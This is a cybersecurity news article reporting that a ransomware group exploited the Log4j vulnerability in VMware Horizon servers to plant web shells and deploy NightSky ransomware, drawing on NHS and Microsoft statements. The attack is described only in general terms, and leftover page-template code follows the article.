Attacks Cloud Data Executive Decisions IoT Malware Mobile Network Security Strategy Threat Defense

IOTW: VMware Horizon targeted by attackers exploiting Log4j

New ransomware leveraging the Log4j vulnerability identified in VMware Horizon servers

Add bookmark
VMware Horizon targeted by attackers exploiting Log4J

The Log4j vulnerability continues to be exploited by threat actors and a new ransomware group has been identified actively targeting Log4Shell vulnerabilities in the VMware Horizon servers.

According to a 5 January 2022 update from the UK’s National Health Service (NHS), the attackers are trying to establish web shells, that can be used to carry out the deployment of malicious software, data exfiltration and the deployment of ransomware. VMware Horizon is a virtual desktop provider which leverages the hybrid cloud.

On 11 January 2022, Microsoft provided an update on Log4j vulnerabilities and noted, “as early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon”.

“Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware,” the Microsoft statement said.

NightSky ransomware

The NightSky ransomware was first discovered in December 2021 by MalwareHunterTeam.

The attacks are being performed by a China-based ransomware operator that Microsoft says it is tracking as DEV-0401.

“DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo and Rook, and has similarly exploited internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).”

Based on Microsoft’s analysis the attackers are using command and control (CnC) servers that spoof legitimate domains.

The NHS statement says that attackers are leveraging the vulnerability to “use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service”.

Log4j impact continues

Since being uncovered in early December 2021 threat actors have taken advantage of the opportunities presented by the Log4J vulnerability.

According to Check Point Research (CPR), Q4 of 2021 saw an all-time peak in weekly cyber-attacks with CPR counting more than 900 attacks per organization, largely due to the Log4j vulnerability.

Ransomware has been identified as a major issue for those who have not successfully patched the vulnerability.

In December, the UK’s National Cyber Security Centre said: “As the situation evolves, we expect attacks to become more targeted. Ransomware groups may look to use Log4Shell as a method of illicit entry into organizations. Once access is secured, threat actors will then look to obtain further access in order to be able to ransom the whole organization in a highly impactful way.”

Tags: Incident of the week IOTW ransomware VMware log4j cryptologer VMware VMware cyber security VMware horizon vulnerabilities night sky ransomware
info@cshub.com/r/n

We hope you enjoy All Access from CS Hub!!<\/p>\r\n<p>Best Regards,<\/p>\r\n<p><a href=https://www.cshub.com/"https:////www.cshub.com///" target=\"_blank\">CS Hub Team<\/a><\/p>\r\n<p>P.S. Be sure to check out our other upcoming <a href=https://www.cshub.com/"https:////www.cshub.com//events?filter_format=ONLINE\%22 target=\"_blank\">All Access events here<\/a>.<\/p>\r\n<p>--------------------------------<\/p>\r\nConnect with us on Social Media: <a href=https://www.cshub.com/"https:////www.linkedin.com//groups//12067996///" target=\"_blank\">LinkedIn<\/a> | <a href=https://www.cshub.com/"https:////twitter.com//CSHubUSA/" target=\"_blank\">Twitter<\/a><\/p>\r\n<p>--------------------------------<\/p>\r\n<p>FAQS<\/p>\r\n<p><b>Can I invite my colleagues?<\/b><br>Yes of course! Please send them this link so they can register for free! [WebUrl]<\/p>\r\n\r\n<p><b>How do I access the sessions?<\/b><br>\r\nAll Access is run on Zoom Events. You should receive an email shortly from Zoom Events with your unique All Access link to the event lobby. Please hold on to that email ahead of the event. We\u2019ll also send you a reminder 24 hours before we go live!<\/p>\r\n\r\n<p><b>Will the agenda be updated?<\/b><br>\r\nYes, the agenda will be continuously updated on the website with the latest sessions & speakers. As we get closer to the event, also look out for our weekly updates which will also include the latest updates information and link to access the event.<\/p>\r\n<p><b>Can I access the sessions On Demand?<\/b><br>\r\nEvery session will be available after the event via the event lobby. We\u2019ll also send you a reminder about the On Demand sessions which will be sent to you after the event is over.<\/p>\r\n<p>--------------------------------<\/p>\r\n<p>RELATED RESOURCES TO READ BEFORE YOUR EVENT<\/p>\r\n<ul>\r\n <li><a href=https://www.cshub.com/"https:////www.cshub.com//executive-decisions//reports//cs-hub-mid-year-market-report-2022?utm_source=eco-event-confirmation-email&utm_medium=email&utm_campaign=eco-event-confirmation-email\%22 target=\"_blank\">CS Hub Mid-Year Market Report 2022<\/a><\/li>\r\n <li><a href=https://www.cshub.com/"https:////www.cshub.com//security-strategy//reports//ciso-strategies-for-proactive-threat-prevention?utm_source=eco-event-confirmation-email&utm_medium=email&utm_campaign=eco-event-confirmation-email\%22 target=\"_blank\">CISO strategies for proactive threat prevention<\/a><\/li>\r\n <li><a href=https://www.cshub.com/"https:////www.cshub.com//security-strategy//reports//how-to-strengthen-email-security-and-protection-against-advanced-ransomware-attacks?utm_source=eco-event-confirmation-email&utm_medium=email&utm_campaign=eco-event-confirmation-email\%22 target=\"_blank\">How to strengthen email security and protection against advanced ransomware attacks<\/a><\/li>\r\n<\/ul>","event_registration_srs_confirmation_email":null,"assets_from_cdn":true},"bant_disabled":0,"sponsorship_disclaimer":null,"sponsorship_disclaimer_text":null,"sponsorship_disclaimer_checkbox_disabled":0,"ext_treat_id":null,"recording_url":null,"file_attachment":null,"ingo_enabled":null,"ingo_activator_id":null,"ingo_autofiller_id":null,"ingo_amplifier_id":null,"ingo_authorizer_id":null,"restricted_content":0,"featured_events_embedded":[],"featured_content_embedded":[{"id":"61b8baaed1d92e4c660cabf4","name":"IOTW: Log4j 2 vulnerability sends shockwaves though the cyber world","description":"Recently uncovered vulnerability in Log4j 2 logging library leaves many organizations open to cyber attacks","file":null,"url":"\/attacks\/articles\/iotw-log4j-2-vulnerability-takes-the-world-by-storm"},{"id":"61c46a17d1d92e64922a3807","name":"IOTW: Attackers exploit Log4j vulnerability","description":"The Log4j vulnerability is already being exploited by threat actors","file":null,"url":"\/attacks\/articles\/iotw-attackers-exploit-log4j-vulnerability"},{"id":"5db60b65e389913961372838","name":"The Ransomware Survival Guide","description":"What Every Organisation Needs To Know Before, During And After An Attack","file":"https:\/\/eco-cdn.iqpc.com\/eco\/files\/channel_content\/posts\/pfpt-uk-wp-ransomware-survival-guide-a4p5DDcR7exyazUe34NO3YKp6CqmSb5lsIgLcgx6iq.pdf","url":"\/security-strategy\/whitepapers\/the-ransomware-survival-guide"}],"featured_content_portal_embedded":null}" >

FIND CONTENT BY TYPE

News Case Studies Interviews White Papers Videos

Cyber Security Hub COMMUNITY

About Us Power10 Contact Us Advertise with us Cookie Policy User Agreement Become a Contributor All Access from CS Hub Become a Member Today Media Partners

ADVERTISE WITH US

Advertise Now

JOIN THE Cyber Security Hub COMMUNITY

Join CSHUB today and interact with a vibrant network of professionals, keeping up to date with the industry by accessing our wealth of articles, videos, live conferences and more.

Cyber Security Hub, a division of IQPC

© 2026 All rights reserved. Use of this site constitutes acceptance of our User Agreement, Privacy Policy and Cookies Settings.

Careers With IQPC | Contact Us | About Us | Cookie Policy